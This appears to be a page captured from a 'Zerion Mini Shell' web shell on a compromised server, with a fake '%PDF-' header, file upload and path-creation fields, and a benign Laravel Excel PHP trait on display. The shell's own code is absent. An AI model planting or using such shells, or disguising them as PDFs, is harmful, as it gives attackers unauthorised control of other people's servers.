%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/geotechnics/api/vendor/maatwebsite/excel/src/Jobs/
Upload File :
Create Path :
Current File : /var/www/html/geotechnics/api/vendor/maatwebsite/excel/src/Jobs/ExtendedQueueable.php

<?php

namespace Maatwebsite\Excel\Jobs;

use Illuminate\Bus\Queueable;

trait ExtendedQueueable
{
    use Queueable {
        chain as originalChain;
    }

    /**
     * @param $chain
     *
     * @return $this
     */
    public function chain($chain)
    {
        collect($chain)->each(function ($job) {
            $this->chained[] = serialize($job);
        });

        return $this;
    }
}

Zerion Mini Shell 1.0